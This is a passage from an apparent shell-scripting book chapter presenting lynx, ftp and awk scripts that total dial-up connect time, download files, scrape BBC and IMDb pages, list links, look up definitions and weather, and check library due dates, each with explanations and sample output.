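#   browser="$(pick_browser lynx links)" || { echo "no text browser found" >&2; exit 1; }
```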
Caution One limitation to the website scraper scripts in this chapter is that if the website that a script depends on
changes its layout, the script can end up broken until you go back and ascertain what's changed with the
site. If any of the website layouts have changed since November 2003, when this chapter was
completed, you'll need to be comfortable reading HTML (even if you don't understand it all) to fix these
scripts. The problem of tracking other sites is exactly why the Extensible Markup Language (XML) was
created: It allows site developers to provide the content of a web page separately from the rules for its
layout.

#58 Calculating Time Spent Online


While every ISP offers relatively expensive unlimited-use dial-up accounts, you might not realize that many ISPs also
have very low-cost monthly dial-up accounts if your usage stays below a certain number of hours of connect time in a
given month. The problem is, how do you calculate your total connection time on a Unix system? Let's have a look. . . .

The Code
#!/bin/sh

# connecttime - Reports cumulative connection time for month/year entries
#    found in the system log file. For simplicity, this is an awk program.

log="/var/log/system.log"      # this is just /var/log/system on some machines
tempfile="/tmp/$0.$$"

trap "rm $tempfile" 0

cat << 'EOF' > $tempfile
BEGIN {
  lastmonth=""; sum = 0
}
{
  if ( $1 != lastmonth && lastmonth != "" ) {
    if (sum > 60) { total = sum/60 " hours" }
    else          { total = sum " minutes"  }
    print lastmonth ": " total
    sum=0
  }
  lastmonth=$1
  sum += $8
}
END {
  if (sum > 60) { total = sum/60 " hours" }
  else          { total = sum " minutes"  }
  print lastmonth ": " total
}
EOF

grep "Connect time" $log | awk -f $tempfile

exit 0

How It Works
On most Unixes, the system log file contains log entries from the PPP (Point-to-Point Protocol) daemon. Here's an
example of a log snippet from a Mac OS X system, looking at /var/log/system.log:
$ grep pppd /var/log/system.log
Jul 12 10:10:57 localhost pppd[169]: Connection terminated.
Jul 12 10:10:57 localhost pppd[169]: Connect time 2.1 minutes.
Jul 12 10:10:57 localhost pppd[169]: Sent 15009 bytes, received 387811 bytes.
Jul 12 10:11:11 localhost pppd[169]: Serial link disconnected.
Jul 12 10:11:12 localhost pppd[169]: Exit.
There are a number of interesting statistics in this snippet, most importantly the actual connect time. Slice those
connect time strings out of the log file, add them up, and you've got your cumulative connect time for the month. This
script is smart enough to calculate month-by-month totals even if you don't rotate your logs (though you should; see
Script #55, Rotating Log Files, for details on how to accomplish this quite easily).
This script is essentially just a big awk program that checks month values in the system.log entries to know how
to aggregate connect time. When $1, the month field in the log file output, is different from lastmonth, and
lastmonth isn't the empty string (which it is when the script begins analyzing the log file), the script outputs the
accumulated time for the previous month and resets the accumulator, sum, to zero:
  if ( $1 != lastmonth && lastmonth != "" ) {
    if (sum > 60) { total = sum/60 " hours" }
    else          { total = sum " minutes"  }
    print lastmonth ": " total
    sum=0
  }
The rest of the program should be straightforward reading. Indeed, awk programs can be quite clear and readable,
which is one reason I like using awk for this type of task.
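To see the aggregation logic in isolation, you can feed the same awk program a couple of fabricated pppd lines (the field positions match the system.log snippet shown earlier; the 30- and 90-minute values are invented). With 120 minutes accumulated, the END block converts to hours:

```shell
#!/bin/sh
# Two made-up "Connect time" lines for the same month, run through the
# book's awk aggregator: 30 + 90 minutes should report as 2 hours.

printf '%s\n%s\n' \
  'Jul 12 10:10:57 localhost pppd[169]: Connect time 30 minutes.' \
  'Jul 13 11:20:12 localhost pppd[169]: Connect time 90 minutes.' |
awk '
{
  if ($1 != lastmonth && lastmonth != "") {
    if (sum > 60) { total = sum/60 " hours" } else { total = sum " minutes" }
    print lastmonth ": " total
    sum = 0
  }
  lastmonth = $1
  sum += $8
}
END {
  if (sum > 60) { total = sum/60 " hours" } else { total = sum " minutes" }
  print lastmonth ": " total
}'
# prints: Jul: 2 hours
```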
Handy savings tip

The dial-up account I use with Earthlink has five hours per month prepaid, so this
utility helps ensure that I know when I exceed that and am going to be charged by
the hour for additional connect time. It's quite helpful for minimizing those monthly
dial-up bills!

Running the Script


This script has no arguments, though you might need to tweak it to ensure that it's pointing to the log file on your
particular system that records pppd output messages.

The Results
You can tell I don't rotate my log files on my laptop too often:
$ connecttime
Apr: 4.065 hours
Jun: 26.71 hours
Jul: 1.96333 hours
Aug: 15.085 hours

#59 Downloading Files via FTP


One of the original killer apps of the Internet was file transfer, and the king of file transfer programs is ftp, the File
Transfer Protocol. At some fundamental level, all Internet interaction is based upon file transfer, whether it's a web
browser requesting an HTML document and its accompanying graphic files, a chat server relaying lines of discussion
back and forth, or an email message traveling from one end of the earth to the other.
The original ftp program still lingers on, and while its interface is quite crude, it's powerful, capable, and well worth
taking advantage of with some good scripts. There are plenty of newer ftp programs around, notably ncftp (see
http://www.ncftp.org/), but with some shell script wrappers, ftp does just fine for uploading and downloading files.
For example, a typical use for ftp is to download files from the Internet. Quite often, the files will be located on
anonymous FTP servers and will have URLs similar to ftp://someserver/path/filename. A perfect use for
a scripted ftp.

The Code
#!/bin/sh

# ftpget - Given an ftp-style URL, unwraps it and tries to obtain the
#    file using anonymous ftp.

anonpass="$LOGNAME@$(hostname)"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 ftp://..." >&2
  exit 1
fi

# Typical URL: ftp://ftp.ncftp.com/2.7.1/ncftpd-2.7.1.tar.gz

if [ "$(echo $1 | cut -c1-6)" != "ftp://" ] ; then
  echo "$0: Malformed url. I need it to start with ftp://" >&2;
  exit 1
fi

server="$(echo $1 | cut -d/ -f3)"
filename="$(echo $1 | cut -d/ -f4-)"
basefile="$(basename $filename)"

echo ${0}: Downloading $basefile from server $server

ftp -n << EOF
open $server
user ftp $anonpass
get $filename $basefile
quit
EOF

if [ $? -eq 0 ] ; then
  ls -l $basefile
fi

exit 0

How It Works
The heart of this script is the sequence of commands fed to the ftp program:
ftp -n << EOF
open $server
user ftp $anonpass
get $filename $basefile
quit
EOF

This script illustrates the essence of a batch file: It prepares a sequence of instructions that it then feeds to a separate
program, in this case ftp. Here we specify the server connection to open, specify the anonymous user (ftp) and
whatever default password is specified in the script configuration (typically your email address), and then get the
specified file from the FTP site and quit the transfer.
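The URL dissection that precedes the here-document is also worth a closer look. With cut treating / as the field separator, "ftp:" is field 1 and the empty string between the two slashes is field 2, so field 3 is the host and everything from field 4 on is the remote path. The following fragment just isolates those three lines against the sample URL from the book:

```shell
#!/bin/sh
# Pull the server, remote path, and local filename out of an ftp:// URL
# exactly the way ftpget does.

url="ftp://ftp.ncftp.com/ncftp/ncftp-3.1.5-src.tar.bz2"

server="$(echo $url | cut -d/ -f3)"      # field 3: the host
filename="$(echo $url | cut -d/ -f4-)"   # fields 4 onward: the remote path
basefile="$(basename $filename)"         # the local name to save under

echo "server=$server"                    # server=ftp.ncftp.com
echo "filename=$filename"                # filename=ncftp/ncftp-3.1.5-src.tar.bz2
echo "basefile=$basefile"                # basefile=ncftp-3.1.5-src.tar.bz2
```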

Running the Script


In use, this script is simple and straightforward: Just fully specify an ftp URL, and it'll download the specified file to the
current working directory.

The Results
$ ftpget ftp://ftp.ncftp.com/ncftp/ncftp-3.1.5-src.tar.bz2
ftpget: Downloading ncftp-3.1.5-src.tar.bz2 from server ftp.ncftp.com
-rw-rw-r--  1 taylor  taylor  394777 Jan  6 08:26 ncftp-3.1.5-src.tar.bz2
Some versions of ftp are more verbose than others, and because it's not too uncommon to find a slight mismatch in
the client and server protocol, those verbose versions of ftp can spit out scary-sounding but safely ignored errors, like
Unimplemented command. For example, here's the same script run within Mac OS X:
$ ftpget ftp://ftp.ncftp.com/ncftp/ncftp-3.1.5-src.tar.bz2
055-ftpget.sh: Downloading ncftp-3.1.5-src.tar.bz2 from server ftp.ncftp.com
Connected to ncftp.com.
220 ncftpd.com NcFTPd Server (licensed copy) ready.
331 Guest login ok, send your complete e-mail address as password.
230-You are user #10 of 16 simultaneous users allowed.
230 230 Logged in anonymously.
Remote system type is UNIX.
Using binary mode to transfer files.
local: ncftp-3.1.5-src.tar.bz2 remote: ncftp/ncftp-3.1.5-src.tar.bz2
502 Unimplemented command.
227 Entering Passive Mode (209,197,102,38,212,218)
150 Data connection accepted from 12.253.112.102:49236; transfer starting for
ncftp-3.1.5-src.tar.bz2 (394777 bytes).
100% |*************************************|   385 KB  266.14 KB/s  00:00 ETA
226 Transfer completed.
394777 bytes received in 00:01 (262.39 KB/s)
221 Goodbye.
-rw-r--r--  1 taylor  staff  394777 Oct 13 20:32 ncftp-3.1.5-src.tar.bz2
If your ftp is excessively verbose, you can quiet it down by adding a -V flag to the ftp invocation (that is, instead of
ftp -n, use ftp -nV).
An alternative to ftpget

Worth noting is that there's a popular utility called curl that
performs the same task as ftpget. If you have curl available, it's
a superior alternative to this script, but because we're going to build
upon the ideas embodied in ftpget for more sophisticated ftp
interactions later in this book, you'll benefit from studying the code
here.

Hacking the Script


This script can be expanded to uncompress the downloaded file automatically (see Script #37, Working with
Compressed Files, for an example of how to do this).
You can also tweak this script just a bit and end up with a simple tool for uploading a specified file to an FTP server. If
the server supports anonymous connections (few do nowadays, thanks to script kiddies and other delinquents, but that's
another story), all you really have to do is specify a destination directory on the command line (or in the script) and
change the get to a put in the main script:
ftp -n << EOF
open $server
user ftp $anonpass
cd $destdir
put $filename
quit
EOF

To work with a password-protected account, you could hard-code your password into the script (a very bad idea), or
you could have the script prompt for the password interactively. To do that, turn off echoing before a read statement,
and then turn it back on when you're done:
echo -n "Password for ${user}: "
stty -echo
read password
stty echo
echo ""
A smarter way to prompt for a password, however, is to just let the ftp program do the work itself, as demonstrated in
Script #81, Synchronizing Directories with FTP.

#60 Tracking BBC News with lynx


As I mentioned earlier, one of the unsung heroes of the command-line Internet is unquestionably the lynx web
browser (or its newer sibling links). Although you can use it to surf the Web if you dislike graphics, its real power is
accessed on the command line itself, within a shell script.
The -dump flag, for example, produces the text but not the HTML source, as shown in the following when checking the
BBC World Service website, tracking technology news:
$ url=http://news.bbc.co.uk/2/low/technology/default.stm
$ lynx -dump $url | head
   [1]Skip to main content
   BBC NEWS / TECHNOLOGY
   [2]Graphics version | [3]Change to UK Edition | [4]BBC Sport Home
   _______________________________________________________________________
   [5]News Front Page | [6]Africa | [7]Americas | [8]Asia-Pacific |
   [9]Europe | [10]Middle East | [11]South Asia | [12]UK | [13]Business |
   [14]Health | [15]Science/Nature | [16]Technology | [17]Entertainment |
   [18]Have Your Say
This output is not very interesting, but it's easily fed to grep or any other command-line utility, because it's just a text
stream at this juncture. Now we can easily check a website to see if there are any stories about a favorite news topic,
computer company, or group of people. Let's see if there's any news about games, with a one-line context shown
around each match, by using grep:
$ lynx -dump $url | grep -C1 -i games
   [21]Screenshot from Vice City   [22]Britons' love affair with games
   Britain is turning into a nation of keen gamers, research by the UK
   games industry trade body suggests.
--
   line-up
   Many of the Nintendo games for the Christmas run-up return to familiar
   characters and brand names.
--
   Virtual pets fed by photos and pronunciation puzzles are just some of
   the mobile phone games popular in Japan.
   [28]Next gen consoles spark concern
   The next generation of consoles could shake up the games industry,
   with smaller firms going bust, say experts.
--
   [37]Text msgs play games with TV
   Your TV and mobile are coming closer together, with game shows played
--
   [38]Mobile gaming 'set to explode'
   Consumers will be spending millions of pounds to play games on their
   mobiles by next year, say experts.

The numbers in brackets are URL references listed later in the output, so to identify the [37] link, the page needs to
be requested again, this time having grep find the associated link URL:
$ lynx -dump $url | grep '37\.'
  37. http://news.bbc.co.uk/2/low/technology/3182641.stm
Switch to -source rather than -dump, and the output of lynx becomes considerably more interesting.
$ lynx -source $url | grep -i 'PublicationDate'
<meta name="OriginalPublicationDate" content="2003/08/29 15:01:14" />
The -source flag produces the HTML source of the page specified. Pipe that source into a grep or two, and you
can extract just about any information from a page, even information within a tag or comment. The bbcnews script
that follows lets you easily scrape the top technology stories from the Beeb at any time.

The Code
#!/bin/sh

# bbcnews - Reports the top stories on the BBC World Service.

url="http://news.bbc.co.uk/2/low/technology/default.stm"

lynx -source $url | \
  sed -n '/Last Updated:/,/newssearch.bbc.co.uk/p' | \
  sed 's/</\
</g;s/>/>\
/g' | \
  grep -v -E '(<|>)' | \
  fmt | \
  uniq

How It Works
Although this is a short script, it is rather densely packed. These scraper scripts are best built iteratively, looking for
patterns to filter in the structure of the web page information and then tuned line by line to produce just the output
desired.
On the BBC website, this process is surprisingly easy because we're already looking at the low-bandwidth version of
the site. The first task is to discard any HTML associated with the navigational menus, bottom material, and so forth, so
that we just have the core content of the page, the stories themselves. That's what the first sed does: it reduces the
data stream by preserving only the headlines and body of the news stories between the "Last Updated" string at the top
of the page and the newssearch.bbc.co.uk search box at the bottom of the page.
The next invocation of sed is uglier than the first, simply because it's doing something peculiar:
sed 's/</\
</g;s/>/>\
/g'
Every time it finds an open angle bracket (<), it's replacing it with a carriage return followed by an open angle bracket.
Close angle brackets (>) are replaced by a close angle bracket followed by a carriage return. If sed supported an \n
notation to specify carriage returns, the second sed invocation would not need to be written across three lines and
would read much more easily, as follows:
sed 's/</\n</g;s/>/>\n/g'
Once the added carriage returns put all the HTML tags on their own lines, the grep invocation strips out all
the tags (-v inverts the logic of the grep, showing all lines that do not match the pattern, and the -E flag specifies
that the argument is an extended regular expression), and the result is fed to fmt to wrap the resultant text lines better.
Finally, the uniq command is used to ensure that there aren't multiple blank lines in the output: It collapses runs of
consecutive identical lines in the data stream down to a single copy.
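You can see this uniq behavior in isolation with a bit of throwaway sample input in place of the BBC feed:

```shell
# uniq collapses runs of identical adjacent lines, so a stretch of
# empty lines becomes a single empty line:
printf 'one\n\n\n\ntwo\n' | uniq
```

Three blank lines in, one blank line out; that's all the script needs to keep its story listing tidy.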

Running the Script


This script has no arguments, and as long as the BBC hasn't changed its basic low-bandwidth page layout, it'll produce a
text-only version of the top technology headlines. The first version of the bbcnews script was written around a layout
that changed during the summer of 2003: The BBC originally had all its articles wrapped in <div> tags but has since
changed that. Fortunately, the update to the script involved only about ten minutes of work.

The Results
Here's the top technology news at the end of August 2003:
$ bbcnews | head -20
Last Updated:
Friday, 29 August, 2003, 15:01 GMT 16:01 UK
Youth suspected of net attack
An American youth is suspected by the FBI
of being one of the authors of the crippling
MSBlast internet worm, say reports.
Britons' love affair with games

Britain is turning into a nation of keen
gamers, research by the UK games industry
trade body suggests.
Familiar faces in Nintendo's line-up
Many of the Nintendo games for the Christmas
run-up return to familiar characters and
brand names.

Hacking the Script


With a little more tuning, you could easily have the top technology story from the BBC News pop up each time you log
in to your account. You could also email the results to your mailbox via a cron job every so often, if you wanted:
bbcnews | mail -s "BBC Technology News" peter
Don't send it to a list, though; there are some copyright and intellectual property issues to consider if you begin
republishing Internet content owned by other people. There's a fine line between fair use and violation of copyright, so
be thoughtful about what you do with content from another website.

#61 Extracting URLs from a Web Page


A straightforward shell script application of lynx is to extract a list of URLs on a given web page, which can be quite
helpful in a variety of situations.

The Code
#!/bin/sh
# getlinks - Given a URL, returns all of its internal and
#    external links.

if [ $# -eq 0 ] ; then
  echo "Usage: $0 [-d|-i|-x] url" >&2
  echo "-d=domains only, -i=internal refs only, -x=external only" >&2
  exit 1
fi

if [ $# -gt 1 ] ; then
  case "$1" in
    -d) lastcmd="cut -d/ -f3 | sort | uniq"
        shift
        ;;
    -i) basedomain="http://$(echo $2 | cut -d/ -f3)/"
        lastcmd="grep \"^$basedomain\" | sed \"s|$basedomain||g\" | sort | uniq"
        shift
        ;;
    -x) basedomain="http://$(echo $2 | cut -d/ -f3)/"
        lastcmd="grep -v \"^$basedomain\" | sort | uniq"
        shift
        ;;
     *) echo "$0: unknown option specified: $1" >&2; exit 1
  esac
else
  lastcmd="sort | uniq"
fi

lynx -dump "$1" | \
  sed -n '/^References$/,$p' | \
  grep -E '[[:digit:]]+\.' | \
  awk '{print $2}' | \
  cut -d\? -f1 | \
  eval $lastcmd

exit 0

How It Works
When displaying a page, lynx shows the text of the page, formatted as best it can, followed by a list of all hypertext
references, or links, found on that page. This script simply extracts just the links by using a sed invocation to print
everything after the "References" string in the web page text, and then processes the list of links as needed based on
the user-specified flags.
The one interesting technique demonstrated by this script is the way the variable lastcmd is set to filter the list of
links that it extracts according to the flags specified by the user. Once lastcmd is set, the amazingly handy eval
command is used to force the shell to interpret the content of the variable as if it were a command, not a variable.
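A tiny illustration of the eval technique, using one of the same filter strings the script builds:

```shell
# Build a filter in a variable, then let eval parse it as a real
# pipeline; without eval, the | would reach sort as a literal
# argument rather than acting as a pipe:
lastcmd="sort | uniq"
printf 'b\na\nb\n' | eval $lastcmd
```

The duplicate `b` lines are sorted together and collapsed, which is exactly the post-processing getlinks does to its extracted URL list.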

Running the Script


By default, this script outputs a list of all links found on the specified web page, not just those that are prefaced with
http:. There are three optional command flags that can be specified to change the results, however: -d produces
just the domain names of all matching URLs, -i produces a list of just the internal references (that is, those
references that are found on the same server as the current page), and -x produces just the external references,
those URLs that point to a different server.

The Results
A simple request is a list of all links on a specified website home page:
$ getlinks http://www.trivial.net/
http://www.intuitive.com/
http://www.trivial.net/kudos/index.html
http://www.trivial.net/trivial.cgi
mailto:nerds@trivial.net
Another possibility is to request a list of all domain names referenced at a specific site. This time let's first use the
standard Unix tool wc to check how many links are found overall:
$ getlinks http://www.amazon.com/ | wc -l
     136
Amazon has 136 links on its home page. Impressive! Now, how many different domains does that represent? Let's
generate a full list with the -d flag:
$ getlinks -d http://www.amazon.com/
s1.amazon.com
www.amazon.com
As you can see, Amazon doesn't tend to point anywhere else. Other sites are different, of course. As an example,
here's a list of all external links in my weblog:
$ getlinks -x http://www.intuitive.com/blog/
LYNXIMGMAP:http://www.intuitive.com/blog/#headermap
http://blogarama.com/in.php
http://blogdex.media.mit.edu/
http://booktalk.intuitive.com/
http://chris.pirillo.com/
http://cortana.typepad.com/rta/
http://dylan.tweney.com/
http://fx.crewtags.com/blog/
http://geourl.org/near/
http://hosting.verio.com/index.php/vps.html
http://imajes.info/
http://jake.iowageek.com/
http://myst-technology.com/mysmartchannels/public/blog/214/
http://smattering.org/dryheat/
http://www.101publicrelations.com/blog/
http://www.APparenting.com/
http://www.backupbrain.com/
http://www.bloghop.com/
http://www.bloghop.com/ratemyblog.htm
http://www.blogphiles.com/webring.shtml
http://www.blogshares.com/blogs.php
http://www.blogstreet.com/blogsqlbin/home.cgi
http://www.blogwise.com/
http://www.gnome-girl.com/
http://www.google.com/search/
http://www.icq.com/
http://www.infoworld.com/
http://www.mail2web.com/
http://www.movabletype.org/
http://www.nikonusa.com/usa_product/product.jsp
http://www.onlinetonight.net/ethos/
http://www.procmail.org/
http://www.ringsurf.com/netring/
http://www.spamassassin.org/
http://www.tryingreallyhard.com/
http://www.yahoo.com/r/p2

Hacking the Script


You can see where getlinks could be quite useful as a site analysis tool. Stay tuned: Script #77, checklinks,
is a logical follow-on to this script, allowing a quick link check to ensure that all hypertext references on a site are
valid.

#62 Defining Words Online


In addition to grabbing information off web pages, a shell script can also feed certain information to a website and
scrape the data that the web page spits back. An excellent example of this technique is to implement a command that
looks up the specified word in an online dictionary and returns its definition. There are a number of dictionaries online,
but we'll use the WordNet lexical database that's made available through the Cognitive Science Department of
Princeton University.
Learn more

You can read up on the WordNet project (it's quite interesting) by visiting its website
directly at http://www.cogsci.princeton.edu/~wn/

The Code
#!/bin/sh
# define - Given a word, returns its definition.

url="http://www.cogsci.princeton.edu/cgi-bin/webwn1.7.1?stage=1&word="

if [ $# -ne 1 ] ; then
  echo "Usage: $0 word" >&2
  exit 1
fi

lynx -source "$url$1" | \
  grep -E '(^[[:digit:]]+\.| has [[:digit:]]+$)' | \
  sed 's/<[^>]*>//g' | (
  while read line
  do
    if [ "${line:0:3}" = "The" ] ; then
      part="$(echo $line | awk '{print $2}')"
      echo ""
      echo "The $part $1:"
    else
      echo "$line" | fmt | sed 's/^/  /g'
    fi
  done
)

exit 0

How It Works
Because you can't simply pass fmt an input stream as structurally complex as a word definition without completely
ruining the structure of the definition, the while loop attempts to make the output as attractive and readable as
possible. Another solution would be a version of fmt that wraps long lines but never merges lines, treating each line
of input distinctly, as shown in Script #33, toolong.
Worthy of note is the sed command that strips out all the HTML tags from the web page source code:
sed 's/<[^>]*>//g'
This command removes all patterns that consist of an open angle bracket (<) followed by any combination of
characters other than a close angle bracket (>), finally followed by the close angle bracket. It's an example of an
instance in which learning more about regular expressions can pay off handsomely when working with shell scripts.
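You can try the pattern on a line of sample HTML to see it in action:

```shell
# Strip every <...> tag from a sample WordNet-style line, exactly
# as the define script does to the page source:
echo '<b>limn</b> -- (trace the <i>shape</i> of)' | sed 's/<[^>]*>//g'
```

Only the tags vanish; the text between them, including the parentheses and dashes, passes through untouched.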

Running the Script


This script takes one and only one argument: a word to be defined.

The Results
$ define limn
The verb limn:
1.
  delineate, limn, outline -- (trace the shape of)
2.
  portray, depict, limn -- (make a portrait of; "Goya wanted to
  portray his mistress, the Duchess of Alba")
$ define visionary
The noun visionary:
1.
  visionary, illusionist, seer -- (a person with unusual powers
  of foresight)
The adjective visionary:
1.
  airy, impractical, visionary -- (not practical or realizable;
  speculative; "airy theories about socioeconomic improvement";
  "visionary schemes for getting rich")

Hacking the Script


WordNet is just one of the many places online where you can look up words in an automated fashion. If you're more of
a logophile, you might appreciate tweaking this script to work with the online Oxford English Dictionary, or even the
venerable Webster's. A good starting point for learning about online dictionaries (and encyclopedias, for that matter) is
the wonderful Open Directory Project. Try http://dmoz.org/Reference/Dictionaries/ to get started.

#63 Keeping Track of the Weather


Another straightforward use of website scraping, illustrating yet a different approach, is a weather forecast tool.
Specify a zip code, and this script goes to the Census Bureau to obtain population and latitude/longitude information,
then visits AccuWeather to extract the current weather in that region.

The Code
#!/bin/sh
# weather - Reports the weather forecast, including lat/long, for a zip code.

llurl="http://www.census.gov/cgi-bin/gazetteer?city=&state=&zip="
wxurl="http://wwwa.accuweather.com"
wxurl="$wxurl/adcbin/public/local_index_print.asp?zipcode="

if [ "$1" = "-a" ] ; then
  size=999; shift
else
  size=5
fi

if [ $# -eq 0 ] ; then
  echo "Usage: $0 [-a] zipcode" >&2
  exit 1
fi

if [ $size -eq 5 ] ; then
  echo ""
  # Get some information on the zip code from the Census Bureau

  lynx -source "${llurl}$1" | \
    sed -n '/^<li><strong>/,/^Location:/p' | \
    sed 's/<[^>]*>//g;s/^ //g'
fi

# The weather forecast itself at accuweather.com

lynx -source "${wxurl}$1" | \
  sed -n '/<font class="sevendayten">/,/[^[:digit:]]<\/font>/p' | \
  sed 's/<[^>]*>//g;s/^[ ]*//g' | \
  uniq | \
  head -$size

exit 0

How It Works
This script provides yet another riff on the idea of using a shell script as a wrapper, though in this case the optional flag
primarily changes the amount of information filtered through the head at the end of the pipe. This script also takes
advantage of the natural source code organization of the two sites to slice out the population and latitude/longitude data
prefixed with the strings <strong> and Location:, respectively, and then it slices out the forecast information
wrapped in a sevendayten font container.
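The wrapper's flag boils down to one number handed to head, which is easy to see with throwaway input standing in for the forecast data:

```shell
# With the default size=5 only the first five forecast lines survive;
# -a sets size=999, so effectively everything passes through.
size=3                       # small value just for demonstration
printf 'day1\nday2\nday3\nday4\nday5\n' | head -$size
```

Everything upstream of head runs identically in both modes; only the final trim changes.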

Running the Script


The standard way to invoke this script is to specify the desired zip code. If census information is available for that
region, it'll be displayed, and the most recent weather forecast summary will be shown too. Add the -a flag, however,
and it skips the census information and reports a full ten-day forecast.

The Results
$ weather 66207

Zip Code: 66207
PO Name: Shawnee Mission (KS)
Population (1990): 13863
Location: 38.957472 N, 94.645193 W
Currently at 10:35 PM
CLEAR
Winds SW at 4 mph.
Temp: 28 / RF 26. UV Index 0.
A typical winter evening in Kansas: a warm 28 degrees Fahrenheit. Brrrrr.

#64 Checking for Overdue Books at the Library


Most of the lynx-related scripts in this book are built around either passing information to a web server via a
method=get form transmission (the passed information is appended to the URL, with a ? separating the URL and its
data) or simply scraping information from predefined web page content. There's a third category of page, however, that
uses a method=post form transmission for submitting information from the web browser to the remote server.
While more difficult, this method can also be emulated using lynx, as this script shows. This specific script sends a
data stream to the Boulder (Colorado) Public Library website, logging the specified user in and extracting a list of books
and other items checked out, with due dates. Notice in particular the creation and use of the postdata temporary
file.

The Code
#!/bin/sh
# checklibrary - Logs in to the Boulder Public Library computer
#    system and shows the due date of everything checked out for
#    the specified user. A demonstration of how to work with the
#    method="post" form with lynx.

lib1="http://nell.boulder.lib.co.us/patroninfo"
lib2="items"
libacctdb="$HOME/bin/.library.account.info"
postdata="/tmp/$(basename $0).$$"
awkdata="/tmp/$(basename $0).awk.$$"

# We need: name, cardno, recordno
#   Given the first, look for the other two in the library account database

if [ $# -eq 0 ] ; then
  echo "Usage: $(basename $0) \"cardholder\""; exit 0
fi

acctinfo="$(grep -i "$1" $libacctdb)"

name="$(echo $acctinfo | cut -d: -f1 | sed 's/ /+/g')"
cardno="$(echo $acctinfo | cut -d: -f2)"
recordno="$(echo $acctinfo | cut -d: -f3)"

if [ -z "$acctinfo" ] ; then
  echo "Problem: account \"$1\" not found in library account database."
  exit 1
elif [ $(grep -i "$1" $libacctdb | wc -l) -gt 1 ] ; then
  echo "Problem: account \"$1\" matches more than one record in library db."
  exit 1
elif [ -z "$cardno" -o -z "$recordno" ] ; then
  echo "Problem: card or record information corrupted in database."
  exit 1
fi

trap "/bin/rm -f $postdata $awkdata" 0

cat << EOF > $postdata
name=${name}&code=${cardno}&submit=Display+record+for+person+named+above
EOF

cat << "EOF" > $awkdata
{ if (NR % 3 == 1) { title=$0 }
  if (NR % 3 == 2) { print $0 "|" title }
}
EOF

lynx -source -post-data "$lib1/$recordno/$lib2" < $postdata | \
  grep -E '(^<td |name=\"renew)' | \
  sed 's/<[^>]*>//g' | \
  awk -f $awkdata | sort

exit 0

How It Works
To get your own version of this script working with your own public library (or similar system), the basic technique is to
browse to the page on the system website at which you must submit your account information. In the case of this
script, that page is http://nell.boulder.lib.co.us/patroninfo. Then, on that page, use the View
Source capability of your browser to identify the names of the form input elements into which you must submit your
account information. In the case of this script, the two input text elements are name and code (library card number).
To duplicate that, I have stored the required information in the $postdata file:
name=${name}&code=${cardno}&submit=Display+record+for+person+named+above
I then use this information to populate the input elements by passing the information to lynx:
lynx -source -post-data "$lib1/$recordno/$lib2" < $postdata
The account information used in the temporary $postdata file, as well as in other places in the script, is stored in a
shared account database file called .library.account.info, which you must build by hand. The toughest part of
building this account database was identifying the internal library ID of my account, but again, the View Source
capability of a modern browser is all that's needed: I just logged in to the library database itself with my name and card
number and then looked at the source code of the resultant page. Buried in the data was the line
<A HREF="/patroninfo/12019/items"
Voilà! I then stored my internal ID value, 12019, in the library account information database file.
Finally, the awk script makes the output prettier:
if (NR % 3 == 1) { title=$0 }
if (NR % 3 == 2) { print $0 "|" title }
It joins the first and second lines of each three-line group of output, discarding the third (blank) line of each group,
because it's not necessary for the desired output information. The end result is quite readable and attractive.
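Here's the same awk joining logic run against a couple of fabricated three-line records (title, due date, blank separator):

```shell
# Join line 2 of each group to line 1, drop the blank line 3:
printf 'Duke the lost engine\nDUE 09-06-03\n\nThe eagle catcher\nDUE 09-06-03\n\n' | \
  awk '{ if (NR % 3 == 1) { title=$0 }
         if (NR % 3 == 2) { print $0 "|" title } }'
```

Each record collapses to a single "DUE date|title" line, which is what the subsequent sort then orders.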

Running the Script


To run this script, simply specify a pattern that uniquely identifies one person in the library account database on your
machine. My account database looks like the following:
$ cat ~/.library.account.info
# name : card number : library internal ID
Dave Taylor:D0060681:12019
Special note

In the interest of not blasting my library card number throughout the known universe, the
data file shown for this script is not exactly correct. Therefore, you won't be able to run the
script and find out what books I have checked out, but the general concept is still
informative.

The Results
It's a simple matter to see what's due:
$ checklibrary Dave
DUE 09-06-03|Duke the lost engine/ W. Awdry ;
DUE 09-06-03|Farmer Will / Jane Cowen-Fletche
DUE 09-06-03|Five little monkeys jumping on t
DUE 09-06-03|Five little monkeys sitting in a
DUE 09-06-03|Main line engines / W. Awdry ; wi
DUE 09-06-03|Now we can have a wedding! / Jud
DUE 09-06-03|The eagle catcher / by Margaret C
DUE 09-06-03|The summer cat / story and pictur
DUE 09-06-03|The tempest : [a novel] / Juan M

Hacking the Script


There are further levels of sophistication that can be added to this script, the most useful of which is to compare the
date string values for today, tomorrow, and the following day with the due dates in the script output to enable warnings
of books due in the next few days.

Another useful addition is a wrapper that can be called from cron to automatically email the results of the
checklibrary script on a schedule. This is also easily done:
#!/bin/sh
# booksdue - Emails results of checklibrary script.

checklibrary="$HOME/bin/checklibrary"
results="/tmp/results.$$"
to="taylor@intuitive.com"

trap "/bin/rm -f $results" 0

$checklibrary Dave > $results

if [ ! -s $results ] ; then
  exit 0        # no books checked out!
fi

( echo "Subject: Boulder Public Library - Books Due"
  echo "To: $to"
  echo "From: (The Library Scraper) www@intuitive.com"
  echo ""
  cat $results
) | sendmail -t

exit 0
Notice that if no books are checked out, the script exits without sending any email, to avoid annoying "no books
checked out" kinds of messages.

#65 Digging Up Movie Info from IMDb


A more sophisticated use of Internet access through lynx and a shell script is demonstrated in this hack, which
searches the Internet Movie Database website (http://www.imdb.com/) to find films that match a specified
pattern. What makes this script interesting is that it must be able to handle two different formats of return information: If
the search pattern matches more than one movie, moviedata returns a list of possible titles, but if there's exactly
one movie match, the information about that specific film is returned.
As a result, the script must cache the returned information and then search through it once to see if it provides a list of
matches and then a second time if it proves to be a summary of the film in question.

The Code
#!/bin/sh
# moviedata - Given a movie title, returns a list of matches, if
#    there's more than one, or a synopsis of the movie if there's
#    just one. Uses the Internet Movie Database (imdb.com).

imdburl="http://us.imdb.com/Tsearch?restrict=Movies+only&title="
titleurl="http://us.imdb.com/Title?"
tempout="/tmp/moviedata.$$"

summarize_film()
{
  # Produce an attractive synopsis of the film

  grep "^<title>" $tempout | sed 's/<[^>]*>//g;s/ (more) //'
  grep '<b class="ch">Plot Outline:</b>' $tempout | \
    sed 's/<[^>]*>//g;s/ (more) //;s/ (view trailer) //' | fmt | sed 's/^/  /'
  exit 0
}

trap "rm -f $tempout" 0 1 15

if [ $# -eq 0 ] ; then
  echo "Usage: $0 {movie title | movie ID}" >&2
  exit 1
fi

fixedname="$(echo $@ | tr ' ' '+')"     # for the URL

